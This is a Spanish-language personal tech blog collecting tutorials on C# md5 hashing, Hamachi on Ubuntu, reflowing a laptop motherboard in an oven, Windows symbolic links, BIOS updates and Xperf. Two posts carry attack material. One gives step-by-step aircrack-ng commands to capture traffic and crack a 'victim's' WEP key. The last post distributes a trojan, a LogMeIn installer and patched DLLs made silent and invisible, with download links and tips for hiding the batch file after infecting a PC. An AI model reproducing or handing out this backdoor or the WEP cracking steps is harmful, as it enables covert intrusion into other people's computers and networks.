Tutoriales

Función de encriptación md5 para para C#. (igual que md5() de php)

Bueno, esto no tiene mucha explicacion, mas que nada, hay que aclarar que esta función, tiene exactamente el mismo comportamiento que la funcion md5 de php.

Código:

[cc lang=”c#” tab_size=”2″ ]
public string md5(string password)
{
//Declaraciones
System.Security.Cryptography.MD5 md5;
md5 = new System.Security.Cryptography.MD5CryptoServiceProvider();

//Conversion
Byte[] encodedBytes = md5.ComputeHash(ASCIIEncoding.Default.GetBytes(password)); //genero el hash a partir de la password original

//Resultado

//return BitConverter.ToString(encodedBytes); //esto, devuelve el hash con “-” cada 2 char
return System.Text.RegularExpressions.Regex.Replace(BitConverter.ToString(encodedBytes).ToLower(), @”-“, “”); //devuelve el hash continuo y en minuscula. (igual que en php)
}
[/cc]

Uso:

md5(string);

por ejemplo:    md5(“lordblacksuca”);  devuelve d9c3a865c54e6aedbb926983974313f4

Recuerda, si te sirvió, comentá.

Error 0x80070643 al instalar Windows Live Essentials

Este error, me hizo perder unas 4 horas de mi dia, y me hizo enojar bastante…. pero lo solucioné.

Después de intentar todos lo resultante de un EXTENSA búsqueda en google, (busque hasta en chino ja) como por ejemplo:

  • Activar Firewall, Defender
  • Eliminar Windows Live con herramientas de terceros
  • Eliminar entradas del registro manualmente
  • Eliminar Windows Live con la utilidad Windows Install Clean Up
  • etc etc etc etc

Encontré lo siguiente:

Debajo del código de error que te muestra el instalador de Windows Live, muestra el nombre del paquete que produjo el error. En mi caso, el paquete era d3dx10-i386.  Si bien no es el mismo paquete el que nos puede causar el problema, la solución es la siguiente:

En esta página: http://eddsn.com/projects/wlewp/15.4.3502.0922/Windows-Live-Essentials-15.4.3502.0922-neutral.html Buscas y descargas el paquete que te da problema, lo descomprimis y lo instalas manualmente!

Ahora, el instalador del paquete, SI te va a decir exactamente cual es el error que tiene y porque no se puede instalar, entonces buscas el error y lo solucionas.

En mi caso, el error era en los archivos de DirectX, es decir, en algunas dll de system32 que tenian un icono con un candadito, lo que hice fue, copiarlas al escritorio, y luego volverlas a pegar en system32 y con eso se le salio el candadito y el paquete se instalo bien.

Entonces después se vuelve a ejecutar la instalación de windows live.

Si te sirvió de algo, comenta!

Saludos

Hamachi en linux. (Ubuntu Server) Solución

Actualizado el 17/7/10

Despues de varias horas de investigacion, encontre que NO hay una “solucion”…   que haga que todo funcione 100%, pero logre hacerlo andar a un 90% al menos.

Logmein, no ha invertido nada en seguir desarrollando  hamachi para linux. Es el segundo producto de logmein al que le hacen esto, logmein para windows mobile, deja de funcionar a partir del 6.5

Bien, mas alla de todo eso,  vamos al grano.

El problema es que siguiendo la instalacion de hamachi como en este tutorial: http://www.supware.net/HamachiUbuntuHowto/ al principio anda todo bien, se conecta y todo, pero si desde una red externa tratamos de acceder, vemos el server pero no podemos hacer ping, ni conectarnos por ssh, ni nada. inclusive a veces aparece como “conectando”  y se queda asi permanentemente…

Probe con softwares como OpenVPN y Neorouter que hacen cosas parecidas (VPN) pero no me convencieron.

entonces, opte por reinstalar hamahi, con una interfaz grafica, con un script que anda dando vueltas pro ahi… para mi sorpresa, la interfaz grafica, soluciono los problemas…  la verdad no se porque la instalacion convencional no funcionaba…. pero este script si funcionó.

Para instalar hamachi con interfaz grafica solo basta con los siguientes pasos:

sudo apt-get remove hamachi
Esto es solo si teniamos instalado hamachi, para desinstalarlo.

Y ahora descargamos el script, le damos permisos de ejecucion, y lo ejecutamos

wget http://webupd8.googlecode.com/files/hamachi-install-ubuntu-1.0.2
sudo chmod +x hamachi-install-ubuntu-1.0.2
sudo ./hamachi-install-ubuntu-1.0.2

Si todo andubo bien, con solo poner hamachi-gui en la linea de comandos, se ejecutara hamachi con la interfaz grafica antigua de windows.

Cabe aclarar que para correr esta interfaz hace falta algun servidor X. Yo tengo FluxBox que es muy liviano y anda muy bien.

SOLO me queda una sola ccosa… el unico problema es que cuando se corta la conexion a internet, no se vuelve a reconectar automaticamente.

Si alguien sabe como solucionar eso, bienvenido sea!!

Actualización:  entontré, este script, en computarz.blogspot.com que es un watchdog para hamachi, es decir, este script mantiene al hamachi online!!!

Lo modifique un poco para que andubiera bien en Ubuntu Server, el script es el siguiente:

[cc lang=”bash”]

#!/bin/bash

scriptname=”`basename \”$0\”`”

function command_pids {

IFS=’

RES=””

for p in `ps xo pid,command | grep “$1″`; do

IFS=’ ‘ hampid=( $p )

pid=${hampid[0]}

if [ “.`basename ${hampid[1]}`” == “.hamachi” ]; then RES=”${RES} $pid”; fi

done

echo $RES;

}

function hamachi_force_terminate {

hamachi stop >/dev/null

sleep 1

for ham_pid in $( command_pids hamachi ); do

kill -9 $ham_pid

done

}

hamachi_running=1

if [ `echo $( command_pids hamachi ) | wc -w` -eq 0 ]; then

hamachi_running=0;

#echo “count not detect running hamachi”

fi

if [ `ip r | grep default -c` -lt 1 ]; then

# No internet gateway, exiting!

exit 1

fi

hamachi_online=`hamachi list | egrep ‘\* [0-9]’ | awk ‘{print $2}’`

count_unreachable=`hamachi list | egrep ‘x [0-9]’ | wc -l`

ping_ok=1

for IP in $hamachi_online; do

ping -c 2 $IP >/dev/null

if [ $? -ne 0 ]; then

echo “ping $IP failed!”

hamachi list | grep $IP

ping_ok=0;

fi # if first ping fails then ping is not OK!

break;

done

if [ $hamachi_running -ne 1 -o $count_unreachable -gt 0 -o $ping_ok -eq 0 ]; then

echo “restarting hamachi: running $hamachi_running unreachable $count_unreachable ping $ping_ok”

if [ `pgrep tuncfg | wc -l` -eq 0 ]; then sudo /sbin/tuncfg; fi

hamachi_force_terminate

hamachi start

CNT=1;

echo -n “Logging in… ” ;

while [ `hamachi login | grep -c failed` -eq 1 -a $CNT -lt 100 ]; do

echo -n “$CNT “;

let CNT=$CNT+1;

sleep 2;

done;

sleep 2;

echo

hamachi get-nicks

#else

#echo “hamachi is online”

fi

[/cc]

Este script se encarga de todo, simplemente lo añadimos a cron para que se ejecute cada x tiempo y le damos permisos de ejecución:

sudo chmod 777 hamachi_watchdog.sh
sudo crontab -e

Seleccionamos un editor y añadimos

*/5 * * * * $HOME/hamachi_watchdog.sh

Siendo por supuesto hamachi_watchdog.sh el nombre y $HOME la ruta de nuestro script!!

Tambien hay que añadir una linea en visudo, para que el tuncfg funcione sin sudo es decir sin necesitar permisos root para que lo pueda ejecutar cron correctamente, entonces hacemos:

sudo visudo

y añadimos la linea:

%admin ALL=NOPASSWD: /sbin/tuncfg

Con eso el script funciona a la perfeccion.

Saludos

Solucion Bangho (Clevo) con problemas de video Nvidia

Si tenes una notebook bangho, (ehem…clevo)  con problemas de video…  mas precisamente, te aparecen unas rayas blancas y de colores en la pantalla ni bien la prendes, y no es problema de flexible, te tengo la solución.

HORNO

Si, así es. Metí la compu al horno y ahora anda bien.
Paso a explicar. Algunas mother con placas de video nvidia, tienen problemas de temperatura. Se suelen sobre-calentar demasiado,  y esta es la causa de que en la soldadura del chip de video con la placa madre, se provoquen micro-fisuras.

Si llevas la ntoebook a un service, ni la miran a la PC, te dicen que tienen que cambiar la placa madre, que probablemente demore un mes (en realidad siempre son mas de 3 jajaja) y encima, si esta fuera de garantía te cobran mas de 400 dolares. siendo que una nueva vale 600.

Para solucionar este problema, hay 3 opciones.

La primera, y mas simple y barata, es agarrar un cesto de basura y desechar la notebook….  muchos hacen esto.

La segunda opción, es llevar la placa a algun lugar  donde hagan este tipo de trabajos y  saquen el chip de video y lo vuelvan a soldar con una tecnica llamada re-balling. (balling de ball, por que se suelda con bolitas de estaño)

La tercera opción, la mas viable se divide en dos. HORNO por un lado, y PISTOLA DE CALOR por otro. básicamente, cualquiera de las dos anda, simplemente que el horno uno lo puede encontrar en cualquier casa, por lo tanto arreglamos la notebook sin poner un peso. Además, casi no hay riesgo de dañar otros componentes.

Bien….   paso a explicar porque se soluciona permanentemente el problema: Cuando calentamos la placa madre,  a un poco mas de 200ºC  el estaño que estaba fisurado, se pone liquido, y se vuelve a unir la micro-fisura. sencillamente esa es toda la ciencia.

Bien, ahora el tutorial paso a paso con fotos:

En primer lugar, los ingredientes necesarios:  (me siento como un cocinero de utilisima jajaja)

  1. Destornillador Philips
  2. Destornillador Plano
  3. Grasa Siliconada (Disipadora)
  4. Cutter
  5. Algodon y Alcohol
  6. Papel Aluminio
  7. HORNO

Para desarmar la notebook, mas precisamente la bangho (clevo) M66SRU o M660SRU  hay que hacer lo siguiente.

Primero, sacar todos los tornillos visibles debajo de la notebook. Luego, sacar el cooler, el disipador del procesador, el procesador en si…   placa de audio, modem, wifi…  todo lo que este a la vista que se pueda sacar.  (son como 40 tornillos asi que buscate un tarrito o algo para ponerlos.)  Cuando tengas todo eso afuera…   saca el teclado… presionando 3 pestañitas que estan arriba del F2, F7 y F12, luego lo levantas, desenchufas y sale.

Dale sin miedo, total la compu no anda….  no tienes nada que perder.

ahora, hay que sacar los tornillos y una placa metalica que esta debajo del teclado, y comenzar a desenchufar con cuidado todos los conectores que hay, por ultimo, sale el disipador metalico grande, de la placa de video.

Estos son todos los componentes de la notebook:
Componentes notebook

Cuando tengas la placa en la mano, lo que tienes que hacer es quitar todas las protecciones de plastico, pila etc etc, solo tiene que quedar la placa.

Placa

chip de video

Ahora, te vas a la cocina, y en una fuente para horno, pones un poco de papel aluminio abajo y haces cuatro pilarsitos para apoyar la placa ahi, es importante que la placa no toque el horno.

base de aluminio

base 2

base 3

y ahora, sin miedo, calentamos el horno al maximo hasta que llegue  a unos 200ºC, luego, lo bajamos a la mitad, ponemos la fuente con la placa y la dejamos unos 15-18 minutos en el horno. al poquito tiempo vamos a sentir olor a quemado, pero no le des importancia. luego, la retiras, y la dejas enfriar unos 30 minutos.

Horno 1

Placa horno

Bien, ahora, hay que ensamblar todo de nuevo. no tengas miedo si te sobran tornillos, a mi me sobraron unos 11 y todavia la notebook no se desarmo jajajaja.

luego la predemos y….

prendiendo

prendiendo 2

Bien, eso fue todo por hoy!!!….    no tengan miedo, prueben esta receta que esta riquisima!!! jajaja.

El truco de la placa al horno funciona!!!!!   busquen otros casos exitosos en youtube… y verán.

UPDATE:

Pasos con la pistola de calor:

Si el problema volvió, o no te animas a meterla al horno y lo queres hacer con una pistola de calor, el proceso es el siguiente:

1) Desarmar la notebook quitar todo, procesador, ram, etc…  TODO, dejar solo la placa.  (obvio no?)

2) Este paso es opcional, con una jeringa de FLUX, pasale bien alrededor del chip de video. (para limpiar).

3) Con papel aluminio, cubre la mayor parte de la placa, y deja un pequeño hueco que deje al descubierto el chip de video.

4) Con la pistola de calor a máxima temperatura (yo use una B&D de 2000W) apuntada directamente al chip, a unos 15 centímetros, calienta el chip durante unos 4 o 5 minutos. (puedes hacer movimientos circulares momentaneos sobre el mismo) (recuerda poner la placa en una superficie que no se queme)

5) Deja la placa en reposo, SIN TOCARLA durante unos 10 minutos. (escucharas crujir los plásticos mientras se enfrían!)

6) Vuelve a armar la PC, y todo deberia funcionar bien!!!

Recuerda que la notebook no encenderá hasta que estén conectados TODOS los conectores internos.

Intenta usar la PC con un COOLER PAD, para evitar sobrecalentamientos excesivos.

FOTOS:

Pistola de calor

Placa

Calentando

Saludos

Crackear WEP en 15 segundos

Este va a ser un tutorial simple. primero empezaremos con algo de teoria.

Hoy en dia cabe aclarar que WEP es un cifrado practicamente obsoleto, y a ésto lo demostraremos con la facilidad con la que se puede obtener una clave. Es por eso, que siempre se deben usar metodos de cifrado WPA/WPA2.

Sin embargo, algunos de los técnicos de los ISP, no tienen ni la menor idea de lo que hacen y dejan las redes wireless domesticas con claves WEP o inclusive hasta abiertas. Tambien algunos  “administradores de red”  (con fuerza en las “”) dejan redes de empresas grandes con cifrados WEP.

Hay que aclarar algo, el cifrado WEP puede tener cierto grado de seguridad utilizando un cifrado de 128bit, es decir, 32 caracteres, y combinando caracteres alfanumericos, con simbolos etc… pero se pierde la practicidad, ya que si alguien necesita conectarse, debera aprenderse una clave de 32 numeros/letras… imposible…

Aunque, por más larga que sea la clave, o si tiene mezclados letras y simbolos, es posible crackearla con una buena cantidad de paquetes.

Esto me da pie para decir que, el secreto del cracking de claves WEP esta en capturar la mayor cantidad de paquetes que anden dando vueltas por la red. mientras más paquetes tengamos menos tardaremos en crackear la pass.

El proceso de crackeo, se hace crackeando(valga la redundancia) el contenido de los IVs de la red. (Vectores de Inicializacion). estos IVs se envian por cada paquete que sale del AP.

Para obtener paquetes, hay varias técnicas, de las cuales, voy a explicar 2.
La primera, es intentar inyectar paquetes con pedidos ACK y ARP para generar algun trafico en la red…   aunque debo decir que hoy en dia, la mayoria de los AP no responden bien cuando intentamos “inyectarle paquetes”…  supongo que traen una proteccion para ello.
La segunda técnica, es infalible. Conciste en esperar a que se genere algun tipo de trafico por parte de los usuarios conectados en el AP. Quizas, si no tenemos suerte, y los clientes del AP solo navegan por algunas webs demoremos un poco en obtener una buena cantidad de paquetes…  pero si justo capturamos paquetes cuando estan viendo un video online, o transfiriendo un archivo…. en menos de 2 minutos tendremos la clave de encriptacion.

Bueno, habiendo dicho ya la teoria del cracking wireless, paso a mencionar las herramientas necesarias.

BACKTRACK

Sin duda, la mejor suite de Seguridad….   no solo sirve para crackear wireless sino, que tambien, trae muchisimas herramientas para penetrar y probar sistemas de seguridad en redes.

Recomiendo hacer un PenDrive booteable con backtrack. (google: como hacer backtrack boot usb)

Si tienes problemas con la placa de red con sus drivers o cosas por el estilo, busca una solucion en google… yo voy a suponer que ya tenemos nuestro backtrack corriendo y todo listo…

Lo primero a realizar, sera inicializar la placa de red en modo monitor…

[cc lang=”bash”]airmon-ng start wlan0[/cc]
(donde wlan0 es el nombre de la placa. nota: dice wlan”cero”)

Cuando este listo, vamos a empezar a escanear redes, para ver todos los AP que esten activos:

[cc lang=”bash”]airodump-ng wlan0[/cc]

Si todo esta bien, vas a ver una lista con todas las redes disponibles.

BSSID: es la MAC del AP
Power: es la calidad o potencia con la que recibimos la señal.
Beacons: son las señales (paquetes) que envia el AP para que nos conectemos.
Data: son los paquetes que nos envio el AP. (estos son los paquetes importantes que deberemos capturar)
ESSID: es el SSID de la red, es decir, el nombre con el que se identifica la red.

Tambien tenemos info del canal en el que está el AP, (CH), la velocidad de transferencia maxima (MB) y el tipo de encriptacion (ENC).  en este ultimo, debe decir WEP. luego, la columa CIPHER es el tipo de cifrado, tambien debe decir wep. AUTH es el tipo de autenticacion…  a nosotros nos interesan los que dicen OPN, o no dicen nada.

Cuando encontremos una red vulnerable, es conveniente anotar en un txt la mac del ap (BSSID) y el SSID (ESSID)
Ahora, hacemos que el airodump, nos capture solo los paquetes de la red que nos interesa y los guarde en un archivo.

[cc lang=”bash”]airodump-ng –ivs –write archivo –bssid (BSSID de la red) –channel (canal de la red) wlan0[/cc]

Eso es todo, ahi ya estamos capturando paquetes. si tenemos suerte y la victima esta usando la red, la cantidad de “DATA” subira muy rapido. Si no tenemos suerte, podemos intentar inyectar paquetes de la siguiente forma:

Nota: no cierres nunca la consola del airodump que esta capturando paquetes. para ejecutar los siguientes comandos abre otra ventana de consola.

[cc lang=”bash”]aireplay-ng –fakeauth 10 -h 00:11:22:33:44:55 -a (BSSID del AP) wlan0[/cc]

Una vez realizado el paso anterior, empezaremos a enviar paquetes ARP (en otra consola):

[cc lang=”bash”]aireplay-ng –arpreplay -h 00:11:22:33:44:55 -b (BSSID del AP)[/cc]

Bien eso es todo lo que podemos hacer. Como dije anteriormente, siempre conviene tener muchisima paciencia y dejar que la PC capture muchos paquetes…. cuando la victima use la red.

Ahora, para crackear, necesitamos de unos 100.000 paquetes en adelante para crackear una WEP de 40 bits (16 caracteres).

Para comenzar a crackear, usamos el comando:

[cc lang=”bash”]aircrack-ng *.ivs[/cc]

De esta forma, el programa comenzara a crackear la clave.

Despues de un tiempo, nos saldra un cartel diciendo KEY FOUND: y la clave al lado en hexadecimal y en ASCII

Bien, espero que les sirva.

Saludos.

Enlaces Simbólicos en Windows

Escribo esta entrada, para no tener que buscar en google la proxima vez que me haga falta!  y ademas, seguramente a alguien le será util esta informacion.

En linux existen unos enlaces de tipo simbolicos, que sirven para enlazar dos directorios o ficheros, en el mismo disco o en cualquier otro. Estos enlaces son transparentes tanto como para el usuario como para las aplicaciones.

De Wikipedia:

Un enlace simbólico, en sistemas unix o linux, indica un acceso a un directorio o fichero que no es real, sino un enlace a otro, que se encuentra en un lugar distinto dentro de la estructura de directorios. Una modificación realizada utilizando este enlace se reflejará en el original; pero, por el contrario, si se elimina el enlace, no se eliminará el auténtico.

Otra opción menos usual es utilizar un enlace duro (hard link), en el que el acceso es indistinguible del real, y el borrado del enlace provoca el borrado del archivo o directorio si era el último enlace duro al fichero.

Una ventaja del enlace simbólico frente a los enlaces duros es que es posible realizar enlaces simbólicos que apunten a objetos en sistemas de archivos que se hallan en otros dispositivos o particiones dentro del mismo dispositivo. Además, cualquier usuario puede crear un enlace simbólico a un directorio, acción que está restringida al superusuario en sistemas UNIX, aunque en los sistemas modernos esta posibilidad no existe.

El comando utilizado normalmente para gestionar los enlaces (tanto duros como simbólicos) es ln.

Los permisos del sistema de archivo sobre el enlace simbólico no tiene relevancia alguna: los permisos en el objeto al cual referencia el enlace simbólico son los que determinan los permisos de acceso.

Es interesante observar que el tamaño de un enlace simbólico es igual al número de caracteres en el camino al objeto que el apunta.

Por ejemplo: En mi caso, utilize estos enlaces simbolicos, porque tengo 3 particiones en mi disco, en una esta ubuntu, y en las otras tengo Windows 7. Uno de los windows es el de uso diario, es decir, demora 15 minutos en arrancar y poder abrir firefox, pero como tengo todo pero todo ahi, no me dan ganas de formatearlo….   el otro windows,  lo tengo “fresco” esta como recien instalado, porque lo tengo frizado, con deep freeze…  entonces esta como nuevo cada vez que prendo la maquina, a éste lo utilizo para poner musica, por lo que solo tengo un par de aplicaciones de audio instaladas.

El problema es que tengo mis playlist y configuraciones en la particion vieja de windows, por lo que hice enlaces simbolicos a las carpetas de musica, programas configuraciones etc. para que las modificaciones que haga en la particion nueva, no sean mas que modificaciones en la particion verdadera.

Esto me permite tener todo al alcance de la mano, como si estuviera usando la otra particion vieja de windows.

Bien vamos a la accion.

En windows 7 esto se puede hacer con MKLINK, pero lo generalizo para todas las versiones de Windows desde XP.

Descargamos esto (deberias copiar el ejecutable en C:\\Windows\System32)

Para poder hacer enlaces simbolicos necesitamos abrir una consola CMD y utilizar el comando de esta forma:

junction origen destino

por ejemplo

junction c:\Users\Usuario\Music d:\Users\MiotroUsuario\Musica

Este ejemplo, creara un enlace simbolico en la carpeta Music, por lo que cuando accedas a esta carpetad esde el explorador de archivos, veras todos los archivos que estan en  d:\Users\MiotroUsuario\Musica

Cabe aclarar que si la carpeta C:\Users\Usuario\Music  existe, se borraran todos los archivos que contenga.

Para borrar un enlace simbolico, basta con ejecutar

junction -d c:\Users\Usuario\Music

Espero que les sirva. saludos

Solución definitiva a los problemas de latencia DPC (audio ASIO entre varios)

Me alegra decir que la gente de nvidia a publicado un driver version beta, que soluciona definitivamente los problemas de latencia DPC.

En mi caso personal, tengo una BCD-3000 y cada 15 segundos o menos, se cortaba el audio…  despues de investigar mucho, encontre que desactivando la placa nvidia desde el administrador de dispositivos, solucionaba el problema, con la concecuencia de que se veia un poco mal graficamente la PC, nada de aero ni eso…  pero no se cortaba el audio.

Con esta version de  los drivers: 257.15 BETA  se solucionan permantentemente los problemas de latencia DPC.

ahora estoy contento con mi BCD reproduciendo audio ASIO y viendo videos al mismo tiempo sin cortes!!!!

puedes descargar los drivers aqui: http://www.nvidia.es/Download/Find.aspx?lang=es

Actualizar BIOS Bangho B-76XOTU (Clevo M746TU) – (B-76X0TU/M74XTU)

Si por alguna razon quieres actualizar la BIOS de esta maquina, por ejemplo, para evitar que el Wifi se apague cada vez que reinicias la maquina, este manual te servirá.

Antes que nada, quiero decirte que actualizar la BIOS es un proceso seguro, pero si cometes algun error, tu computadora, quedara inutilizable. (se puede reparar mediante hard. pero se complica)

Necesitaras un PenDrive USB, y descargate los siguientes archivos:

BIOS_223.zip –>  Esta es la BIOS propiamente Dicha. (ultima version a la hora de escribir esta entrada 25/5/10)
EC_14.zip –>Esta es la Keyboard BIOS (debe ser instalada ANTES de instalar la BIOS)
SP27608.exe –> Esta utilidad de HP nos permitira formatear el pendrive como un disco booteable.
bootme.zip –> Estos archivos que colocaremos en el pendrive, inician una ventana de comandos DOS.

los pasos son los siguientes:

1- extrae los contenidos del archivo bootme.zip en cualquier directorio. por ejemplo C:\\bootme. Luego instala la utilidad de HP

2- Formatea la unidad  (pendrive) con la utilidad de HP. marca la casilla de “Create a DOS startup Disk” selecciona la opcion “Using DOS files allocated at” y ahi busca la carpeta donde se descomprimieron los archivos de bootme.zip.

3- una vez terminado ese proceso, crea dos carpetas en el pendrive, por ejemplo, “bios” y “ec”  en esas carpetas extrae el contenido de los archivos BIOS_223.zip y EC_14.zip respectivamente. Es importante NO MEZCLAR LOS ARCHIVOS.

Una vez realizados esos pasos, respira profundo, toma fuerzas y reinicia la PC con el pendrive puesto. (asegurate de que la bios bootee desde el pendrive.)

4- escribe cd ec cuando ya estes en la carpeta donde se encuentran los archivos de la EC, escribe update.bat Este proceso es rapido, y escucharas que el cooler de la PC se acelera momentaneamente.

Realizado el ultimo paso sigue con el pendrive puesto, la PC se reinicia y vuelve a aparecer la ventana DOS

5- escribe cd bios y ahora si, llego la hora, escribe update.bat

Este último proceso demora un poco mas, pero si has hecho todo bien, no tiene porque haber problemas.

En la proxima entrada, detallo un “problema” (si se puede llamar asi jejee) muy tonto que tuve.

Saludos Si te sirvio, comenta!!!

Como instalar Xperf en Windows 7

Xperf es una herramienta que desarrollo el Microsoft development team, que basicamente loggea todos los procesos del kernel.

Se utiliza mucho para ver que proceso esta causando X problema.  Personalmente lo utilize para resolver un problema con la latencia DPC que no me permitia trabajar con audio ASIO.

Todo muy lindo, pero a la hora de descargar el famoso Xperf, microsoft nos redirige a una descarga de 2.5GB   que ???!!!!

Bueno, esta es la forma de instalar Xperf sin descargar todo el Development Kit:

La pagina de descarga es esta:
http://www.microsoft.com/downloads/details.aspx?FamilyID=c17ba869-9671-4330-a63e-1fd44e0e2505&displaylang=en

ahi descargan un pequeño instalador. cuando se termine la descarga lo ejecutan y despues de unos pasos, veran algo asi:

ahi, tienen que seleccionar solamente el item marcado en la imagen de arriba.

(solo 250MB)

luego, descargan e instalan el soft.

Ahora, en la carpeta C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin

encontraran los archivos para instalar xperf: wpt_x86.msi y wpt_x64.msi (instala el correspondiente segun tu SO)

ejecuta el instalador, y cuando te pida la carpeta de destino cambia de

C:\Program Files\Microsoft Windows Performance Toolkit\

a

C:\xperf\

luego termina de instalar.

eso es todo, ya tienes el Xperf listo para funcionar.  Quizas en un proximo post escriba sobre como solucionar problemas de latencia DPC.

(Texto original en ingles de Jummy May, MDSN forums)

Troyano con LogMeIn –> Actualización a la versión 4.0.0.966

Esta versión corrige algunos bugs de LogMeIn y ademas cambia buena parte del estilo grafico de la pagina.

Si tenias el LogMeIn instalado, ya te habrá pedido que lo actualices, pero si lo tenias patcheado, para que sea invisile, nunca te va a pedir que lo actualices.

Recomiendo actualizar a la nueva version, porque me parece que la version vieja va a dejar de funcionar….(eso es lo que creo.)

Bueno, con respecto al  Troyano, corregi todos los problemas encontrados y problemas  de compatibilidad de Windows.

En el paquete de descarga, no encontraran el downloader, porque éste funciona perfectamente como está explicado aqui.

En el paquete SI van a encontrar éstos archivos principales:

LMI_Backdoor_by_Lordblacksuca.msi –> este es el instalador de LogMeIn v4.0.0.966 modificado para que la instalación sea totalmente silenciosa.

logmein-patch.exe –> este es un paquete autoextraible donde se encuentran los archivos .dll v4.0.0.966 modificados para hacer que logmein sea totalmente invisible. (la ruta de extraccion de este paquete es la de instalacion de logmein por defecto).

ejecutar.bat –> Ahora solo hay un ejecutable con lineas comentadas. dentro de este archivo, ademas de editar el nombre de usuario y contraseña de tu cuenta con logmein deberas descomentar las lineas segun tu SO.  Esta todo explicado ahi dentro.

ADEMAS

originales.rar –>  Jejeje, aqui estan los .dll originales del logmein, por si se infectan ustedes mismos, reemplacen estos archivos, asi pueden parar el logmein y luego desinstalarlo desde el panel de control.

taskkill.exe –> Este archivo siempre tiene que estar en la misma carpeta que el ejecutar.bat solo es el taskkill original de un windows XP Professional, pero de esta forma nos aseguramos que los procesos para patchear se terminen correctamente.

Si tienes problemas con el ejecutar.bat  es desir que no se te instale, o no se patchee automaticamente, seguramente es por alguna incopatibilidad de los comandos del Fucking Windows. Por favor, deja un comentario con tu problema.


DESCARGA

Megaupload

Rapidshare

Bueno, eso es todo por ahora, como siempre, espero comentarios y bugs con respecto al troyano.

Hay muchas formas de usarlo, yo se los doy listo…  despues, de lo que haga cada uno con el, bueno, yo no me hago cargo. jejejeje

una ultima aclaracion, recuerda que si vas a infectar una PC, el archivo ejecutar.bat tiene TUS datos de conexion con logmein. DEBES ocultarlo, convertirlo a exe… borrarlo o lo que quieras, pero no lo olvides por ahi!!! Puedes usar el programa ExeScript 3.0 para hacer un .exe solido, y totalmente invisible.

Si estas leyendo ésto y no entiendes nada…  te recomiendo que leas todo ESTO desde el principio…